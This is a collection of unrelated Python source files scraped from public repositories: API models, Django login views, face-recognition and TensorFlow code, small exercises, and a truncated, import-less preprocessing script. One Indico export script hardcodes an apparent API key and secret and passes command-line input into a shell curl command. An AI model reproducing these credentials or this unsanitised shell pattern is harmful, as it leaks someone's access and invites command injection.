christianmbrodbeck@gmail.com
|
42a601ec67877ad564b2a27019c601b1b6d54007
|
ce6cb09c21470d1981f1b459293d353407c8392e
|
/lib/jnpr/healthbot/swagger/models/devicegroup_schema_logging_syslog.py
|
39bcac4a8b3a6a430adb23b8b3c466be84056209
|
[
"Apache-2.0"
] |
permissive
|
minefuto/healthbot-py-client
|
c4be4c9c3153ef64b37e5344bf84154e93e7b521
|
bb81452c974456af44299aebf32a73abeda8a943
|
refs/heads/master
| 2022-12-04T07:47:04.722993
| 2020-05-13T14:04:07
| 2020-05-13T14:04:07
| 290,145,286
| 0
| 0
|
Apache-2.0
| 2020-08-25T07:27:54
| 2020-08-25T07:27:53
| null |
UTF-8
|
Python
| false
| false
| 4,871
|
py
|
# coding: utf-8
"""
Healthbot APIs
API interface for Healthbot application # noqa: E501
OpenAPI spec version: 1.0.0
Contact: healthbot-hackers@juniper.net
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class DevicegroupSchemaLoggingSyslog(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'daemons': 'list[str]',
'log_level': 'str'
}
attribute_map = {
'daemons': 'daemons',
'log_level': 'log-level'
}
def __init__(self, daemons=None, log_level=None): # noqa: E501
"""DevicegroupSchemaLoggingSyslog - a model defined in Swagger""" # noqa: E501
self._daemons = None
self._log_level = None
self.discriminator = None
if daemons is not None:
self.daemons = daemons
self.log_level = log_level
@property
def daemons(self):
"""Gets the daemons of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:return: The daemons of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:rtype: list[str]
"""
return self._daemons
@daemons.setter
def daemons(self, daemons):
"""Sets the daemons of this DevicegroupSchemaLoggingSyslog.
:param daemons: The daemons of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:type: list[str]
"""
allowed_values = ["ingest", "tand", "publishd"] # noqa: E501
if not set(daemons).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `daemons` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(daemons) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._daemons = daemons
@property
def log_level(self):
"""Gets the log_level of this DevicegroupSchemaLoggingSyslog. # noqa: E501
Set the logging level # noqa: E501
:return: The log_level of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:rtype: str
"""
return self._log_level
@log_level.setter
def log_level(self, log_level):
"""Sets the log_level of this DevicegroupSchemaLoggingSyslog.
Set the logging level # noqa: E501
:param log_level: The log_level of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:type: str
"""
if log_level is None:
raise ValueError("Invalid value for `log_level`, must not be `None`") # noqa: E501
allowed_values = ["error", "debug", "warn", "info"] # noqa: E501
if log_level not in allowed_values:
raise ValueError(
"Invalid value for `log_level` ({0}), must be one of {1}" # noqa: E501
.format(log_level, allowed_values)
)
self._log_level = log_level
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DevicegroupSchemaLoggingSyslog, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DevicegroupSchemaLoggingSyslog):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"nitinkr@juniper.net"
] |
nitinkr@juniper.net
|
357714394ac3d126251c1f1d6028f9c3b887f31f
|
92b3ade5b69889b806f37c440ff7bbe9ad1e9ca9
|
/mysite/project/apps/myauth/views.py
|
1dba2ec8e0f00a539fef9d249c3270ae41be4ca3
|
[] |
no_license
|
BorisovDima/WebProject
|
4b468ed07555140890165954710185612d629ec9
|
e84e5e5d83028412bdfb8cb93c8ec0fde5c54980
|
refs/heads/master
| 2022-12-10T17:17:56.159721
| 2019-02-22T02:42:53
| 2019-02-22T02:42:53
| 160,443,451
| 0
| 0
| null | 2022-11-22T03:08:53
| 2018-12-05T01:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 3,505
|
py
|
from django.urls import reverse
from django.template.loader import render_to_string
from django.views.generic import CreateView, RedirectView
from django.contrib.auth import get_user_model
from django.contrib.auth.views import LogoutView, LoginView
from django.conf import settings
from django.contrib.auth.views import PasswordResetView
from django.utils.decorators import method_decorator
from django.views.decorators.http import require_POST
from django.shortcuts import get_object_or_404
from project.apps.account.mixins import NotLoginRequiredMixin
from project.apps.ajax_utils_.mixins import AjaxMixin
from .models import BanList
from .forms import MyRegForm
from .utils import handler_ip, set_geo
from project.apps.back_task.tasks import sendler_mail
@method_decorator(require_POST, name='dispatch')
class Registr(NotLoginRequiredMixin, AjaxMixin, CreateView):
captcha = True
def get_data(self, form):
return {'html': render_to_string('myauth/verify.html', {'user': form.instance.username,
'mail': form.instance.email})}
class Login(NotLoginRequiredMixin, LoginView):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['reg_form'] = MyRegForm()
return context
def post(self, req, *args, **kwargs):
self.ip = handler_ip(req)
self.ban_list, created = BanList.objects.get_or_create(ip=self.ip, defaults={'ip': self.ip})
status = self.ban_list.check_ban()
return super().post(req, *args, **kwargs) if status['status'] == 'ok' else status['response']
def form_valid(self, form):
self.ban_list.delete()
return super().form_valid(form)
def form_invalid(self, form):
self.ban_list.banned()
return super().form_invalid(form)
def get_success_url(self):
return reverse('account:profile', kwargs={'login': self.request.user.username})
class Logout(LogoutView): pass
class Vertify_account(RedirectView):
def get_redirect_url(self, *args, **kwargs):
user = get_object_or_404(get_user_model(), uuid=self.kwargs['uuid'], is_verified=False)
user.is_verified = True
user.save(update_fields=['is_verified'])
set_geo(user, self.request)
self.url = reverse('myauth:login')
return super().get_redirect_url(*args, **kwargs)
@method_decorator(require_POST, name='dispatch')
class ResetPass(AjaxMixin, PasswordResetView):
def get_data(self, form):
return {'html': render_to_string('myauth/reset_pass.html', {'email': form.cleaned_data['email']})}
from django.views.generic import FormView
class HelpLogin(NotLoginRequiredMixin, AjaxMixin, FormView):
captcha = True
def get_data(self, form):
return {'email': form.cleaned_data['email']}
def form_valid(self, form):
res = super().form_valid(form)
if res.status_code == 200:
user = get_user_model().objects.filter(email=form.cleaned_data['email'])
if user and not user.first().is_verified:
user = user.first()
kwargs = {'link': 'http://localhost%s' % reverse('myauth:verify', kwargs={'uuid': user.uuid}),
'user': user.username}
sendler_mail.delay('', '', settings.DEFAULT_FROM_EMAIL, [user.email],
template_name='back_task/mail_registr.html', **kwargs)
return res
|
[
"you@example.com"
] |
you@example.com
|
a129616b2d8205c61a851bfcdd1eb74d7f79d46e
|
7db3916d8ac8a66a954d230e43bb74b37f81357c
|
/04day/04-私有属性.py
|
6736df4df214cab944cec7f434b9bcd4fc74452e
|
[] |
no_license
|
2001128/2_1805
|
2fc96bc6f8e2afcd9d4743891ecd87b754c28cc8
|
b3d4bfab2703a7c6aa1c280669376efeab28cad1
|
refs/heads/master
| 2020-03-22T20:53:14.903808
| 2018-07-30T06:04:49
| 2018-07-30T06:04:49
| 140,639,052
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
class Father():
def __init__(self):
self.__count = 3#处过对象的个数
def getCount(self):
return self.__count
def setCount(self,count):
self.__count = count
f = Father()
#f.__count = 10
#print(f.__count)
f.setCount(20)
print(f.getCount())
|
[
"335775879@qq.com"
] |
335775879@qq.com
|
991d23daa0afbd61d11515d50d29b0a0a1b642f9
|
bcfbb49b054380db6e7aeadc2d4e62292b5307f9
|
/singh/ch6_4_lu_factorization/ex6_18_lu_factorization3.py
|
692e64036d5d8462dd770ddd094eadebbe9287ac
|
[] |
no_license
|
hiddenwaffle/Ax-equals-b
|
de82d43248962ae072fd8b8a0c9eab37b52fd472
|
e5f4e4ac5b928440ee557eff9cf4d4683b8f7e56
|
refs/heads/main
| 2023-04-15T11:24:51.010982
| 2021-04-28T18:31:00
| 2021-04-28T18:31:00
| 322,965,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
from sympy import *
A = Matrix([
[1, 4, 5, 3],
[5, 22, 27, 11],
[6, 19, 27, 31],
[5, 28, 35, -8]
])
L, U, _ = A.LUdecomposition()
pprint([L, U])
pprint(L * U)
|
[
"hiddenwaffle@users.noreply.github.com"
] |
hiddenwaffle@users.noreply.github.com
|
0358e81903c9f25adf5e47fa32c43ed72879f3a9
|
ac60e6e0bede04f3897c2a9806d4b0909abfea31
|
/flaskblog/recognizer.py
|
34693038bff7a781dd4286b0a168f7272b2b99e4
|
[] |
no_license
|
teja0508/Web-App-with-Face-Verification-Login-System
|
35c387becbc99e37a58d8ae858b48ac31595a6d1
|
6da47d7e5a15a0f32751511d2e1c99be57d0894e
|
refs/heads/master
| 2022-11-18T09:12:54.284572
| 2020-07-03T05:48:32
| 2020-07-03T05:48:32
| 276,817,914
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,124
|
py
|
import face_recognition
import numpy as np
import cv2
import os
def Recognizer():
video = cv2.VideoCapture(0)
known_face_encodings = []
known_face_names = []
base_dir = os.path.dirname(os.path.abspath(__file__))
image_dir = os.path.join(base_dir, "static")
image_dir = os.path.join(image_dir, "profile_pics")
names = []
for root,dirs,files in os.walk(image_dir):
for file in files:
if file.endswith('jpg') or file.endswith('png'):
path = os.path.join(root, file)
img = face_recognition.load_image_file(path)
# label = file[:len(file)-4]
label = file
if label == 'default.jpg':
pass
else:
img_encoding = face_recognition.face_encodings(img)[0]
known_face_names.append(label)
known_face_encodings.append(img_encoding)
face_locations = []
face_encodings = []
while True:
check, frame = video.read()
small_frame = cv2.resize(frame, (0,0), fx=0.5, fy= 0.5)
rgb_small_frame = small_frame[:,:,::-1]
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
matches = face_recognition.compare_faces(known_face_encodings, np.array(face_encoding), tolerance = 0.5)
face_distances = face_recognition.face_distance(known_face_encodings,face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
face_names.append(name)
if name not in names:
names.append(name)
for (top,right,bottom,left), name in zip(face_locations, face_names):
top*=2
right*=2
bottom*=2
left*=2
cv2.rectangle(frame, (left,top),(right,bottom), (0,255,0), 2)
# cv2.rectangle(frame, (left, bottom - 30), (right,bottom - 30), (0,255,0), -1)
# font = cv2.FONT_HERSHEY_DUPLEX
# cv2.putText(frame, name, (right - int(right / 4), bottom - 10), font, 0.8, (255,255,255),1)
cv2.imshow("Face Recognition Panel",frame)
if cv2.waitKey(5000):
break
video.release()
cv2.destroyAllWindows()
return names
|
[
"lchandratejareddy@gmail.com"
] |
lchandratejareddy@gmail.com
|
6a630ade66aaaa5fc763aabec423966dac49db2d
|
9908afd9f51caa50d0204f43cd658ab558694d45
|
/gits-find.py
|
3c2058e0f2adebbf1e156bad76ebca4dd6c47154
|
[
"MIT"
] |
permissive
|
furas/python-git
|
351289b59037ec6f6ac54d3f28e50facd350e753
|
9ce447b05a59c31459e0005526ffc21ba5fafaca
|
refs/heads/master
| 2021-03-19T16:46:22.405785
| 2017-12-01T20:40:19
| 2017-12-01T20:40:19
| 101,456,771
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
import os
#path = os.path.expanduser('~')
path = os.path.expandvars('$HOME')
for root, folders, files in os.walk(path):
if '.git' in folders:
print(root)
|
[
"furas@tlen.pl"
] |
furas@tlen.pl
|
fa38461ea17f79f0bbde5f9888ee3584bc8e2702
|
dec691f24a5a8c204c9394778d237ee83c48ac94
|
/indicoExport/caleventexport.py
|
59d30b50a8ac2defb9d87d549b165a7f64fd505e
|
[] |
no_license
|
sgnoohc/login
|
c94eafd6bfb81224f6943cd807a455f5a48085ae
|
cdf3e08b721e6659e8122df46b2c08638bfde3c2
|
refs/heads/master
| 2021-01-19T23:01:12.526630
| 2017-09-22T16:57:45
| 2017-09-22T16:57:45
| 88,910,252
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,693
|
py
|
#!/bin/env python
# script to download from indico the ics files you want
# ==================================================
# code starts here
# ==================================================
import hashlib
import hmac
import urllib
import time
import os
import sys
def build_indico_request(path, params, api_key=None, secret_key=None, only_public=False, persistent=False):
items = params.items() if hasattr(params, 'items') else list(params)
if api_key:
items.append(('apikey', api_key))
if only_public:
items.append(('onlypublic', 'yes'))
if secret_key:
if not persistent:
items.append(('timestamp', str(int(time.time()))))
items = sorted(items, key=lambda x: x[0].lower())
url = '%s?%s' % (path, urllib.urlencode(items))
signature = hmac.new(secret_key, url, hashlib.sha1).hexdigest()
items.append(('signature', signature))
if not items:
return path
return '%s?%s' % (path, urllib.urlencode(items))
if __name__ == '__main__':
API_KEY = '35129c98-2ccc-4412-a331-d6a17d7de85e' # From the https://indico.cern.ch/user/api/, copy the content in the field "Token"
SECRET_KEY = 'ffd7251b-7ff3-493c-953a-d389bb7ba0a6' # From the https://indico.cern.ch/user/api/, copy the content in the field "Secret"
PATH = '/export/event/%s.ics'%(sys.argv[1])
PARAMS = {
# 'limit': 100,
# 'detail': 'sessions',
# 'detail': 'sessions',
# 'detail': 'events',
}
url = 'https://indico.cern.ch%s'%build_indico_request(PATH, PARAMS, API_KEY, SECRET_KEY)
command = "curl -s -o event.ics -O '%s' "%(url)
print command
os.system(command)
#eof
|
[
"sgnoohc@gmail.com"
] |
sgnoohc@gmail.com
|
81aa2ee36e3ae549fea5d72bdca67d1626f824c9
|
fbf254edbd7af1f83e074ac6b574442d32b57b9d
|
/leetcodeProblems/gas_station.py
|
3fc728f7e31a4829b05c81044f5652344d6da79c
|
[] |
no_license
|
Madhivarman/DataStructures
|
cc55456d2dc7d276d364c67f3c0b74f6e0ac3a6e
|
f42d71c7c404c72a31b69d37e459f7d7ae9bfe25
|
refs/heads/master
| 2022-05-08T18:18:29.910621
| 2022-03-28T07:24:55
| 2022-03-28T07:24:55
| 133,028,620
| 4
| 0
| null | 2019-11-23T14:58:16
| 2018-05-11T10:57:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,063
|
py
|
"""
Problem Statement:
There are N gas stations along a circular route, where the amount of gas at station i is gas[i].
You have a car with an unlimited gas tank and it costs cost[i] of gas to travel from station i to its next station (i+1). You
begin the journey with an empty tank at one of the gas stations.
Return the starting gas station's index if you can travel around the circuit once in the clockwise direction, otherwise return -1.
Note:
If there exists a solution, it is guaranteed to be unique.
Both input arrays are non-empty and have the same length.
Each element in the input arrays is a non-negative integer.
"""
class Solution:
def canCompleteCircuit(self, gas, cost):
gas_tank, start_station = 0, 0
if sum(gas) < sum(cost):
return -1
for i in range(len(gas)):
gas_tank += gas[i] - cost[i]
if gas_tank < 0:
start_station = i + 1
gas_tank = 0
return start_station
|
[
"noreply@github.com"
] |
Madhivarman.noreply@github.com
|
8a0d2a0618ff00ce1f4cd0197b13da15959da76a
|
2f63688febd21dc3ae6b19abfa79ad313c820154
|
/1368_Minimum_Cost_to_Make_at_Least_One_Valid_Path_in_a_Grid/try_2.py
|
dd920daca99b0c539180370abf6f9d628c951810
|
[] |
no_license
|
novayo/LeetCode
|
cadd03587ee4ed6e35f60294070165afc1539ac8
|
54d0b3c237e0ffed8782915d6b75b7c6a0fe0de7
|
refs/heads/master
| 2023-08-14T00:35:15.528520
| 2023-07-30T05:56:05
| 2023-07-30T05:56:05
| 200,248,146
| 8
| 1
| null | 2022-11-19T04:37:54
| 2019-08-02T14:24:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
class Solution:
def minCost(self, grid: List[List[int]]) -> int:
'''
每一次挑cost最小 & (目前離終點的直線距離最小 => 自己實踐heap去比較)
=> 每個點都可以,要換or不換
但可能會走到重複的點 => 用dict存起來,若cost比較小,才能放進去heap (每次取出來之前也去比較一次)
'''
def getPos(x, y, move):
if move == 1:
y += 1
elif move == 2:
y -= 1
elif move == 3:
x += 1
else:
x -= 1
return x, y
def heuristic(i, j, cost):
return cost*0.1 + i + j
height = len(grid)
width = len(grid[0])
table = collections.defaultdict(lambda: float('inf'))
heap = [(heuristic(0, 0, 0), 0, 0, 0)]
while heap:
h, cost, i, j = heapq.heappop(heap)
if i == height-1 and j == width-1:
return cost
# 拿出來之後先比較一次
if h >= table[i, j]:
continue
else:
table[i, j] = h
for move in range(1, 5):
x, y = getPos(i, j, move)
if 0 <= x < height and 0 <= y < width and table[x, y] > heuristic(cost, x, y):
if move == grid[i][j]:
heapq.heappush(heap, (heuristic(cost, x, y), cost, x, y))
else:
heapq.heappush(heap, (heuristic(cost+1, x, y), cost+1, x, y))
return -1
|
[
"f14051172@gs.ncku.edu.tw"
] |
f14051172@gs.ncku.edu.tw
|
282061daa67fa2c6724f19e0f19560f2cfe09b3a
|
24eff244d3a5327d79ae6244f748b7689c43ad5e
|
/tfmodules/model/model_builder.py
|
29daaddfe4778d8ba8b1a4edacea3ff7ba83bf60
|
[
"Apache-2.0"
] |
permissive
|
motlabs/dont-be-turtle
|
e41a3d532169abdf2cf89dca9067c50da7ba08e8
|
bd754736ea6caa3ccd58866657d97112f4bcf1cf
|
refs/heads/develop
| 2022-12-12T12:22:20.770696
| 2018-12-02T15:16:40
| 2018-12-02T15:16:40
| 129,588,368
| 33
| 5
|
Apache-2.0
| 2022-11-22T02:48:39
| 2018-04-15T07:47:18
|
Python
|
UTF-8
|
Python
| false
| false
| 6,184
|
py
|
# Copyright 2018 Jaewook Kang (jwkang10@gmail.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================================
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from hourglass_layer import get_hourglass_layer
from reception_layer import get_reception_layer
from supervision_layer import get_supervision_layer
from output_layer import get_output_layer
def get_model(ch_in,model_config,scope=None):
'''
ch_in (256x256x3) -->
reception layer (64x64x256) -->
hourglass layer (64x64x256) -->
output layer (64x64x3) -->
loss
'''
net = ch_in
end_points = {}
orig_scope = scope
with tf.variable_scope(name_or_scope=scope,default_name='model',values=[ch_in]) as sc:
scope = 'reception'
tf.logging.info('-----------------------------------------------------------')
tf.logging.info('[model_builder] model in shape=%s' % ch_in.get_shape().as_list() )
with tf.variable_scope(name_or_scope=scope, default_name='reception', values=[net]):
net,end_points_recept, _= get_layer(ch_in = net,
model_config = model_config.rc_config,
layer_type = scope)
end_points.update(end_points_recept)
tf.logging.info('[model_builder] reception out shape=%s' % net.get_shape().as_list() )
scope = 'stacked_hg'
intermediate_heatmaps = []
with tf.variable_scope(name_or_scope=scope, default_name='stacked_hg', values=[net]):
for stacking_index in range(0,model_config.num_of_hgstacking):
shorcut = net
# hourglass layer
net, end_points_hg, _ = get_layer(ch_in = net,
model_config = model_config.hg_config,
layer_index = stacking_index,
layer_type = 'hourglass')
end_points.update(end_points_hg)
tf.logging.info('[model_builder] hourglass%d out shape=%s' % (stacking_index,
net.get_shape().as_list()))
if stacking_index < model_config.num_of_hgstacking - 1:
# supervision layer
net, end_points_sv,heatmaps = get_layer(ch_in = net,
model_config = model_config.sv_config,
layer_index = stacking_index,
layer_type = 'supervision')
end_points.update(end_points_sv)
tf.logging.info('[model_builder] supervision%d out shape=%s' % (stacking_index,
net.get_shape().as_list()))
# intermediate heatmap save
intermediate_heatmaps.append(heatmaps)
# shortcut sum
net = tf.add(x=net, y=shorcut,
name= 'shortcut_sum' + str(stacking_index))
# output layer
scope = 'output'
with tf.variable_scope(name_or_scope=scope, default_name='output', values=[net]):
net, end_point_out, _ = get_layer(ch_in = net,
model_config = model_config.out_config,
layer_type = scope)
end_points.update(end_point_out)
tf.logging.info('[model_builder] model out shape=%s' % net.get_shape().as_list())
tf.logging.info('-----------------------------------------------------------')
out = tf.identity(input=net, name= sc.name + '_out')
end_points[sc.name + '_out'] = out
end_points[sc.name + '_in'] = ch_in
tf.logging.info('[model_builder] building hg model complete')
return out, intermediate_heatmaps, end_points
def get_layer(ch_in,
model_config,
layer_index=0,
layer_type='hourglass'):
net = ch_in
end_points = {}
heatmaps_out = None
if layer_type == 'hourglass':
net, end_points = get_hourglass_layer(ch_in=net,
model_config=model_config,
layer_index=layer_index,
scope=layer_type)
elif layer_type is 'supervision':
net, end_points, heatmaps_out = get_supervision_layer(ch_in=net,
model_config=model_config,
layer_index=layer_index,
scope=layer_type)
elif layer_type is 'reception':
net, end_points = get_reception_layer(ch_in=net,
model_config=model_config,
scope=layer_type)
elif layer_type is 'output':
net, end_points = get_output_layer(ch_in=net,
model_config=model_config,
scope=layer_type)
return net, end_points, heatmaps_out
|
[
"jwkang10@gmail.com"
] |
jwkang10@gmail.com
|
53287ca13c22599139bdaa837069e8b398154f5d
|
8f3ceff01367c4550b2dd71f65af70c28bf8eed1
|
/GenericViewCRUD/products/forms.py
|
4efdd9fa21f8e4f628acf149cff5aff3da40856b
|
[] |
no_license
|
anupjungkarki/ClassBasedVIEW-and-GenericVIEW-CRUD
|
53110379420fca90cceec58c221e51f6523392a0
|
ed99e50fab8b531d9a2167b11eb4eee8cc439351
|
refs/heads/master
| 2023-02-13T16:32:33.930218
| 2021-01-07T09:22:44
| 2021-01-07T09:22:44
| 327,561,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
from django import forms
from .models import Product
class ProductForm(forms.ModelForm):
class Meta:
model = Product
fields = ['name', 'slug', 'description', 'image', 'price']
|
[
"anupkarki2012@gmail.com"
] |
anupkarki2012@gmail.com
|
9785f44eadbf85ca4d7a7c30a7ebc249dffeaa30
|
f7aa321f384c6a052e0a88e2adaea9bea2c5f7a6
|
/geophys_utils/dataset_metadata_cache/_dataset_metadata_cache.py
|
ba9a6bd7f3010369dfd6fff1306bd62c7d158947
|
[
"Apache-2.0"
] |
permissive
|
alex-ip/geophys_utils
|
4af3637b6d47b818106ddfb0a11b3230992dcf71
|
bcbf4205b7b06d88a26adfe0c4da036d54425751
|
refs/heads/master
| 2023-07-05T20:22:31.889192
| 2023-05-09T07:03:22
| 2023-05-09T07:03:22
| 226,753,773
| 2
| 0
|
Apache-2.0
| 2019-12-09T00:37:35
| 2019-12-09T00:37:35
| null |
UTF-8
|
Python
| false
| false
| 5,203
|
py
|
'''
Created on 19 Jul. 2018
@author: Alex Ip
'''
import abc
import logging
import os
import yaml
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO) # Initial logging level for this module
settings = yaml.safe_load(open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'dataset_metadata_cache_settings.yml')))
class Distribution(object):
'''
Distribution class definition
'''
def __init__(self,
url,
protocol
):
'''
Distribution class Constructor
'''
self.url = url
self.protocol = protocol
class Dataset(object):
'''
Dataset class definition
'''
def __init__(self,
dataset_title,
ga_survey_id,
longitude_min,
longitude_max,
latitude_min,
latitude_max,
convex_hull_polygon,
keyword_list,
distribution_list,
point_count,
metadata_uuid=None,
start_date=None,
end_date=None
):
'''
Dataset class Constructor
'''
self.dataset_title = dataset_title
self.ga_survey_id = ga_survey_id
self.longitude_min = longitude_min
self.longitude_max = longitude_max
self.latitude_min = latitude_min
self.latitude_max = latitude_max
self.convex_hull_polygon = convex_hull_polygon
self.metadata_uuid = metadata_uuid
self.keyword_list = keyword_list
self.distribution_list = distribution_list
self.point_count = point_count
self.start_date = start_date
self.end_date = end_date
class DatasetMetadataCache(object):
'''
DatasetMetadataCache class definition
'''
# Tuple containing field names for results of search_dataset_distributions function
dataset_distribution_search_fields = ('ga_survey_id',
'dataset_title',
'distribution_url',
'convex_hull_polygon',
'longitude_min',
'longitude_max',
'latitude_min',
'latitude_max',
'point_count',
'start_date',
'end_date',
'metadata_uuid'
)
_db_engine = None
@abc.abstractmethod
def __init__(self, debug):
'''
DatasetMetadataCache class Constructor
@parameter debug: Boolean flag indicating whether debug output is required
'''
# Initialise and set debug property
self._debug = None
self.debug = debug
@abc.abstractmethod
def add_dataset(self, dataset):
'''
Function to insert or update dataset record
'''
return
@abc.abstractmethod
def add_survey(self,
ga_survey_id,
survey_name=None
):
'''
Function to insert survey if necessary
'''
return
@abc.abstractmethod
def add_keywords(self,
dataset_id,
keyword_list):
'''
Function to insert new keywords
'''
return
@abc.abstractmethod
def add_distributions(self,
dataset_id,
distribution_list):
'''
Function to insert new distributions
'''
return
@abc.abstractmethod
def search_dataset_distributions(self,
keyword_list,
protocol,
ll_ur_coords=None
):
'''
Function to return list of dicts containing metadata for all datasets with specified keywords and bounding box
Note that keywords are searched exclusively, i.e. using "and", not "or"
'''
return
@property
def db_engine(self):
return type(self)._db_engine
@property
def debug(self):
return self._debug
@debug.setter
def debug(self, debug_value):
if self._debug != debug_value or self._debug is None:
self._debug = debug_value
if self._debug:
logger.setLevel(logging.DEBUG)
logging.getLogger(self.__module__).setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.getLogger(self.__module__).setLevel(logging.INFO)
logger.debug('Logger {} set to level {}'.format(logger.name, logger.level))
logging.getLogger(self.__module__).debug('Logger {} set to level {}'.format(self.__module__, logger.level))
|
[
"alex@trentham.net.au"
] |
alex@trentham.net.au
|
7b2a4ddc6b7320391e621149122948f371ce83e6
|
6e8f2e28479566dbaa338300b2d61f784ff83f97
|
/.history/code/preprocess_20210419145511.py
|
677f86d7c80961ac295d19e0eb7be0aa3ad43e69
|
[] |
no_license
|
eeng5/CV-final-project
|
55a7d736f75602858233ebc380c4e1d67ab2b866
|
580e28819560b86f6974959efb1d31ef138198fc
|
refs/heads/main
| 2023-04-09T21:28:21.531293
| 2021-04-21T19:57:22
| 2021-04-21T19:57:22
| 352,703,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,674
|
py
|
import os
import random
import numpy as np
from PIL import Image
import tensorflow as tf
import hyperparameters as hp
class Datasets():
""" Class for containing the training and test sets as well as
other useful data-related information. Contains the functions
for preprocessing.
"""
def __init__(self, data_path, task, aug):
self.data_path = data_path
self.emotions = ['angry', 'happy', 'disgust', 'sad', 'neutral', 'surprise', 'fear']
self.emotion_dict = self.createEmotionDict()
self.task = task
self.aug = aug
if self.aug == '1':
self.createSimpleData()
else:
self.createComplexData()
# Dictionaries for (label index) <--> (class name)
self.idx_to_class = {}
self.class_to_idx = {}
# For storing list of classes
self.classes = [""] * hp.num_classes
# Setup data generators
self.train_data = self.get_data(
os.path.join(self.data_path, "train/"), False)
self.test_data = self.get_data(
os.path.join(self.data_path, "test/"), False)
def cleanTestDirs(self,):
for e in self.emotions:
pathy = self.data_path+'test/'+e
pics = 1
for f in Path(pathy).glob('*.jpg'):
if (pics <= 100):
pics+=1
else:
try:
#f.unlink()
os.remove(f)
except OSError as e:
print("Error: %s : %s" % (f, e.strerror))
def cleanTrainDirs(self,):
for e in self.emotions:
pathy = self.data_path+'train/'+e
for f in Path(pathy).glob('*.jpg'):
try:
#f.unlink()
os.remove(f)
except OSError as e:
print("Error: %s : %s" % (f, e.strerror))
def cleanAll(self,):
self.cleanTestDirs()
self.cleanTrainDirs()
def createPixelArray(self, arr):
arr = list(map(int, arr.split()))
array = np.array(arr, dtype=np.uint8)
array = array.reshape((48, 48))
return array
def equalize_hist(self, img):
img = cv2.equalizeHist(img)
return img
def showImages(self, imgs):
_, axs = plt.subplots(1, len(imgs), figsize=(20, 20))
axs = axs.flatten()
for img, ax in zip(imgs, axs):
ax.imshow(img,cmap=plt.get_cmap('gray'))
plt.show()
def augmentIMG(self, img, task):
imgs = [img]
img1 = self.equalize_hist(img)
imgs.append(img1)
img2 = cv2.bilateralFilter(img1, d=9, sigmaColor=75, sigmaSpace=75)
imgs.append(img2)
if task == 3:
kernel = np.array([[-1.0, -1.0, -1.0],
[-1.0, 9, -1.0],
[-1.0, -1.0, -1.0]])
img3 = cv2.filter2D(img2,-1,kernel)
imgs.append(img3)
img4 = self.equalize_hist(img3)
imgs.append(img4)
img5 = cv2.bilateralFilter(img4, d=9, sigmaColor=100, sigmaSpace=100)
imgs.append(img5)
img6 = cv2.flip(img, 1) # flip horizontally
imgs.append(img6)
return imgs
def saveIMG(self, arr, num, folderLoc):
im = Image.fromarray(arr)
filename = folderLoc + "image_"+ num+".jpg"
im.save(filename)
def createTrain(self, task):
path1 = self.data_path+"train.csv"
df = pd.read_csv(path1) # CHANGE ME
base_filename = data_path+"train/" # CHANGE ME
for index, row in df.iterrows():
px = row['pixels']
emot = int(row['emotion'])
emot_loc = self.emotion_dict[emot]
filename = base_filename + emot_loc
img = self.createPixelArray(px)
img_arr = self.augmentIMG(img, task)
idx = 0
for i in img_arr:
num = str(index) + "_" + str(idx)
idx +=1
self.saveIMG(i, num, filename)
def createTest(self, task):
path1 = data_path +"icml_face_data.csv"
